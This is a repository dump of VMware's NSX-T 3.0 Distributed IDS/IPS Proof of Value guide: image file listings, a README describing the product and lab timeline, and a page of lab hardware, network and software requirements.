--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_29.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_29.gif
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_3.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_3.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_30.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_30.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_31.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_31.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_32.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_32.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_33.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_33.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_34.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_34.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_35.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_35.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_36.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_36.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_37.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_37.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_38.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_38.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_39.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_39.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_4.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_4.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_40.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_40.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_41.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_41.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_42.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_42.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_43.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_43.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_44.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_44.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_45.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_45.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_46.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_46.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_47.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_47.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_48.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_48.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_49.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_49.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_5.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_5.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_50.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_50.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_51.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_51.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_52.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_52.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_53.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_53.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_54.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_54.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_55.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_55.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_56.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_56.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_57.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_57.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_58.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_58.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_59.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_59.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_6.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_6.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_60.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_60.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_61.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_61.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_62.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_62.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_7.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_7.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_8.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_8.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_9.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_9.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/NSX_Logo.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/NSX_Logo.jpeg
--------------------------------------------------------------------------------
/3.1/docs/assets/images/placeholder.tmp:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Images/IDPS_POC_1.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_1.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_10.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_10.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_11.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_11.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_12.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_12.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_13.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_13.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_14.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_14.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_18.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_18.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_2.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_2.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_3.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_3.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_4.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_4.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_40.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_40.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_41.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_41.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_42.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_42.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_5.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_5.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_6.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_6.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_7.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_7.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_8.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_8.PNG
--------------------------------------------------------------------------------
/Images/IDPS_POC_9.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/IDPS_POC_9.PNG
--------------------------------------------------------------------------------
/Images/placeholder.tmp:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Images/screenshot-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/screenshot-1.png
--------------------------------------------------------------------------------
/Images/screenshot-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/Images/screenshot-2.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | # NSX-T 3.0 - Distributed IDS/IPS Proof of Value Guide
6 |
7 |
8 |
9 |
10 |
11 | ---
12 | **NEW!** Click [here](/3.1/README.md) for the NSX-T 3.1 IDS/IPS Guide
13 |
14 | ---
15 | ## Overview
16 | The goal of this Proof of Value (PoV) is to allow customers to get hands-on experience with the [NSX Distributed IDS/IPS](https://www.vmware.com/products/nsx-distributed-ids-ips.html). The expectation from people participating in the PoV is that they will complete the exercises outline in this guide in order to become familair with the key capabilities offered by the NSX Distributed IDS/IPS. While not the focus of this PoV guide, particpants will also gain basic experience with the Distributed Firewall and other NSX capabilities during this PoV process.
17 |
18 | While this PoV guide is quite prescriptive, participants can choose to modify any part of the workflow as desired. The guide is primarily focused on getting customers familiar with IDS/IPS, hence **the deployment of the lab environment and rest of the configuration is automated through the use of a provided PowerShell script**. After meeting the-requisites and running the script, a fully configured nested NSX-T environment is available to particpants, including a number of attacker and victim workload which are used as part of the IDS/IPS exercises. Once the nested lab has been deployed, the lab guide walks users through a number of attack scenarios, using tools like **Metasploit** to showcase the value of the NSX Distributed IDS/IPS.
19 |
20 | ## Introducing the VMware Service-defined Firewall
21 |
22 | 
23 |
24 | The VMware Service-defined firewall is VMware’s solution to secure east-to-west traffic across multi-cloud environments and is made up of 3 main components. First of all, we have our distributed firewall, which enables micro-segmentation. The distributed firewall is in essence an in kernel firewall that sits at the vNIC of every workload in the environment, enabling any level of filtering, micro-segmentation between the tiers of an application, or macro-segmentation for example isolating production from development workloads, or anything in between, completely independent of the underlying networking. Over the last few years, we’ve evolved the distributed firewall into a full Layer 7 stateful firewall.
25 |
26 | NSX Intelligence is our distributed Visibility and analytics platform, fully integrated into NSX and provide visibility of all flows without having to rely on traditional mechanism such as Netflow or copying all traffic and also provide policy formulation which enables customers to get to full micro-segmentation much quicker. And with NSX-T 3.0 we’ve added in the distributred IDS/IPS which is based on the same distributed architecture, now for the first time, enabling customers to have a network based IDS/IPS that sits at the VNIC of every workload, with the ability to intercept every flow, without having to hairpin any traffic regardless of network connectivity.
27 |
28 | ## Introducing the NSX Distributed IDS/IPS
29 |
30 | One of the key challenges with traditional network-based IDS/IPS solutions is that they rely on a massive amount of traffic to be hairpinned or copied across to the centralized IPS appliance. This often involves network architecture and also means that growing organizations have to continuously keep adding firewalls or IDS appliances to their centralized cluster to keep up with the growing amount of traffic that needs inspection.
31 | Another challenge with these solutions is that they don't offer protection against lateral movement of attacks within a particular network segment. If we have two application workload deployed here in the same VLAN, there isn’t any feasible way to insert an inline IPS appliance in between these workloads and repeat that for all the workloads in your entire datacenter.
32 | Furthermore, in virtualized datacenters, by leveraging DRS and vmotion, workloads often move to other hosts, clusters or datacenters. This means that traffic now gets redirected to another IPS appliance which has no context of existing flow and may even have a different policy applied
33 | Finally, centralized, network based IDS/IPSes have very little understanding of the context of a flow. They just look at network traffic without known much about where the flow originated and whether or not target of an attack is potentially vulnerable. As a result, all traffic needs to be matches against several thousands of signatures. Signatures that are detecting an exploit against an vulnerability on apache are also applied to a server that runs Mysql and so on. This results in two key challenges, one being a high number of false positives which make it difficult for a security operator to distinct important events that require immediate action from all the other ones, especially if the events don’t include context about who the victim is and what’s running on that victim machine. A second challenge with having to run all traffic through all signatures is that it significantly reduces throughput.
34 |
35 | The NSX Distributed IDS/IPS combines some of the best qualities of host based IPS solutions with the best qualities of network bases IPS solutions to provide a radically different solution which enables Intrusion Detection and Prevention at the granularity of a workload and the scale of the entire datacenter.
36 |
37 | Similar to the operational model of the distributed firewall, the NSX distributed IDS/IPS is deployed in the hypervisor when NSX-T is enabled on that hypervisor. It does not require the deployment of any additional appliances on that hypervisor, on the guest VM or anywhere in the network.
38 |
39 | Instead of hairpining traffic to a centralized IDS appliance across the network, IDS is applied right at the source or destination of the flow as it leaves a workloads or comes in. As is the case with our distributed firewall, this also means that there is need need to re-architect the network to apply IDS/IPS, and this also means that we can inspect traffic between workloads regardless of whether these workloads are the same vlan or logical segment or a different VLAN. The Distributed Firewall and IDS/IPS is applied to the traffic even before it hits the distributed switch. Almost invariably, the actual objective of an attack is not the same as where the attacker initially gained access, this means that an attacker will try to move through the environment in order to get to steal the valuable data they are after. Hence being able to not just defend against the initial attack vector, but also against lateral movement is criticial. Micro-segmentation using the distributed firewall is key in reducing the attack surface and makes lateral movement a lot more difficult, and now for the first time becomes operationally feasible to front-end each of your workloads with an Intrusion Detection and Prevention service to detect and block attempts at exploiting vulnerabilities wherever they may exist and regardless of whether the attacker is trying to gain initial access in the environment, or has already compromised a workload on the same VLAN and is now trying to move laterally to their target database on that same VLAN.
40 |
41 | Our largest and most successful customers heavily rely on context to micro-segment their environment. They leverage security-groups based on tags and other constructs to create a policy that is tied directly to the application itself rather than to network constructs like IP addresses and ports. This same context is also a very important differentiation which solves two key challenges seen with traditional IDS and IPS solutions. First of all, because of being embedded in the hypervisor we have access to a lot more context than we could just learn by sitting on the network. We know for instance the name of each workload and, the application it’s part of and so on. VMware tools and the Guest Introspection framework can provide us with additional context such as the version of the operating system that is running on each guest and even what process or user has generated a particular flow . If a database server is known to be vulnerable to a specific vulnerability that is being exploited right now, it obviously warrants immediate attention while a network admin triggering an IPS signature by running as scan should be far less of an immediate concern.
42 |
43 | In addition to enabling the appropriate prioritization, the same context can also be used to reduce the number of false positives, and increase the number of zero-false-positive workloads, as we have a good idea whether or not a target is potentially vulnerable, therefore reducing the amount of alerts that are often overwhelming with a traditional network-based solution. Finally, leveraging context, we can enable only the signatures that are relevant to the workloads we are protecting. If the distributed IDS instance applied to an Apache server, we can enable only the signatures that are relevant and not the vast majority of signatures that are irrelevant to this workload. This drastically reduces the performance impact seen with traditional IDS/IPS.
44 |
45 | ---
46 | ## Disclaimer and acknowledgements
47 | This lab provides and leverages common pen-test tools including Metasploit as well as purposfully vulnerable workloads built using Vulhub (https://github.com/vulhub/vulhub) . Please only use these tools for the intended purpose of completing the PoC, isolate the lab enviornment properly from any other environment and discard when the PoC has been completed.
48 |
49 | The automation script is based on work done by [William Lam](https://github.com/lamw) with additional vSphere and NSX automation by [Madhu Krishnarao](https://github.com/madhukark)
50 |
51 | ---
52 | ## Changelog
53 |
54 | * **07/8/2020**
55 | * Intial partial draft of the guide
56 | * **08/18/2020**
57 | * Intial Completed guide
58 | ---
59 | ## Intended Audience
60 | This PoV guide is intended for existing and future NSX customers who want to evaluate the NSX Distributed IDS/IPS functionality. Ideally, the PoV process involves people covering these roles:
61 |
62 | * CISO Representative
63 | * Data Center Infrastructure Team
64 | * Network Architects
65 | * Security Architects
66 | * Security Operations Center Analyst
67 | * Enterprise Applicatoin Owner
68 |
69 | ---
70 | ## Resources commitment and suggested timeline
71 | The expected time commitment to complete the PoV process is about 6 hours. This includes the time it takes for the automated deployment of the nested lab environment. We suggest to split up this time across 2 week. The below table provides an estimate of the time it takes to complete each task:
72 |
73 | | Task | Estimated Time to Complete | Suggested Week |
74 | | ------------- | ------------- | ------------- |
75 | | Customize Deployment Script Variables | 30 minutes | Week 1 |
76 | | Run Deployment Script | 90 minutes | Week 1 |
77 | | Verify Lab Deployment | 30 minutes | Week 1 |
78 | | Initial IDS/IPS Configuration | 30 minutes | Week 1 |
79 | | Simple Attack Scenario | 30 minutes | Week 1 |
80 | | Lateral Attack Scenario | 60 minutes | Week 2 |
81 | | Advanced Attack and configuration tuning | 60 minutes | Week 2 |
82 | | Apply micro-segmentation to limit the attack surface | 60 minutes | Week 2 |
83 |
84 | ---
85 | ## Support during the PoV Process
86 |
87 | Existing NSX customers should reach out to their NSX account team for support during the PoV process.
88 |
89 | ---
90 | ## Table of Contents
91 | * [Requirements](/docs/1-Requirements.md)
92 | * [Customize Deployment Script](/docs/2-CustomizeScript.md)
93 | * [Run Deployment Script](/docs/3-RunScript.md)
94 | * [Verify Lab Deployment](/docs/4-VerifyDeployment.md)
95 | * [Initial IDS/IPS Configuration](/docs/5-InitialConfiguration.md)
96 | * [Basic Attack Scenario](/docs/6-BasicAttackScenario.md)
97 | * [Lateral Movement Scenario](/docs/7-LateralMovementScenario.md)
98 | * [Advanced Exercises](/docs/8-AdvancedConfiguration.md)
99 | * [Segmenting the Evironment](/docs/9-Segmentation.md)
100 | * [Conclusion](/docs/10-Conclusion.md)
101 |
102 | [***Next Step: 1. Requirements***](docs/1-Requirements.md)
103 |
--------------------------------------------------------------------------------
/docs/1-Requirements.md:
--------------------------------------------------------------------------------
1 |
2 | ## 1. Requirements
3 | ### Introduction to the Lab Deployment Script
4 | Along with this PoV guide, we are providing a [script](https://github.com/vmware-nsx/eval-docs-ids-ips/blob/master/Nested%20Lab%20Deployment.ps1) which automated the lab environment deployment. This script makes it very easy for anyone to deploy a nested vSphere vSphere lab environment for learning and educational purposes. All required VMware components (ESXi, vCenter Server, NSX Unified Appliance and Edge) are automatically deployed, attacker and multiple victim workloads are deplyed, and NSX-T networking configuration is applied in order to anyone to start testing the NSX Distributed IDS/IPS as soon as the deploment is completed.
5 |
6 | Below is a diagram of what is deployed as part of the solution and you simply need to have an existing vSphere environment running that is managed by vCenter Server and with enough resources (CPU, Memory and Storage) to deploy this "Nested" lab
7 |
8 | 
9 |
10 | * Gray: Pre-requisites (Physical ESXi Server, vCenter managing the server and a Port group to provide connectivity of nested lab environment
11 | * Blue: Management and Edge Components (vCenter, NSX Manager and NSX Edge) Deployed by PowerCLI Script
12 | * Red: External VM running Metasploit and other functions deployed by PowerCLI Script on Physical Environment vCenter
13 | * Yellow: Nested ESXi hypevisors deployed by PowerCLI Script and managed by nested vCenter
14 | * Purple: vSAN datastore across 3 nested ESXi hypervisors configured by PowerCLI Script
15 | * Green: NSX Overlay DMZ Segment and vulnerable Web-VMs connected to it. Segment created and VMs deployed by PowerCLI Script.
16 | * Orange: NSX Overlay Internal Segment and vulnerable App-VMs connected to it. Segment created and VMs deployed by PowerCLI Script.
17 |
18 | ### Physical Lab Requirements
19 | Here are the requirements for NSX-T Distributed IDS/IPS Proof of Value.
20 |
21 | #### vCenter
22 | * vCenter Server running at least vSphere 6.7 or later
23 | * If your physical storage is vSAN, please ensure you've applied the following setting as mentioned [here](https://www.virtuallyghetto.com/2013/11/how-to-run-nested-esxi-on-top-of-vsan.html)
24 |
25 | #### Compute
26 | * Single Physical host running at least vSphere 6.7 or later
27 | * Ability to provision VMs with up to 8 vCPU
28 | * Ability to provision up to 64 GB of memory
29 |
30 | #### Network
31 | * Single pre-configured Standard or Distributed Portgroup (Management VLAN) used to connect the below components of the nested environment, in my example, VLAN-194 is used as this single port-group
32 | * 8 x IP Addresses for VCSA, ESXi, NSX-T Manager, Edge VM Management, Edge VM Uplink and External VM
33 | * 4 x IP Addresses for TEP (Tunnel Endpoint) interfaces on ESXi and Edge VM
34 | * 1 x IP Address for T0 Static Route (optional)
35 | * All IP Addresses should be able to communicate with each other. These can all be in the same subnet (/27). In the example configuration provided the 10.114.209.128/27 subnet is used for all these IP addresses/interfaces: vCenter, NSX Manager Managenet Interface, T0 Router Uplink, Nested ESXi VMKernel and TEP interfaces (defined in IP pool), External VM.
36 |
37 | #### Storage
38 | * Ability to provision up to 1TB of storage
39 |
40 | #### Other
41 | * Desktop (Windows, Mac or Linux) with latest PowerShell Core and PowerCLI 12.0 Core installed. See [ instructions here](https://blogs.vmware.com/PowerCLI/2018/03/installing-powercli-10-0-0-macos.html) for more details
42 |
43 |
44 | ### OVAs and images for the nested Lab
45 | * vSphere 7 & NSX-T OVAs:
46 | * [vCenter Server Appliance 7.0.0B](https://my.vmware.com/group/vmware/downloads/details?downloadGroup=VC700B&productId=974&rPId=47905)
47 | * [NSX-T Manager 3.0.1 OVA](https://my.vmware.com/group/vmware/downloads/details?downloadGroup=NSX-T-301&productId=982&rPId=48086)
48 | * [NSX-T Edge 3.0.1 for ESXi OVA](https://my.vmware.com/group/vmware/downloads/details?downloadGroup=NSX-T-301&productId=982&rPId=48086)
49 | * [Nested ESXi 7.0 OVA - Build 15344619](https://download3.vmware.com/software/vmw-tools/nested-esxi/Nested_ESXi7.0_Appliance_Template_v1.ova)
50 | * External VM and Victim VM OVA - Links to these will be provided to PoV participatns by their NSX account team.
51 | * Preferrably, the deployed NSX Manager should have Internet access in order to download the lastest set of IDS/IPS signatures.
52 |
53 | > **Note**: if you are not entitled or not able to access the above links, you can download a free trial and obtain a license for all of the above through https://www.vmware.com/try-vmware.html
54 |
55 |
56 |
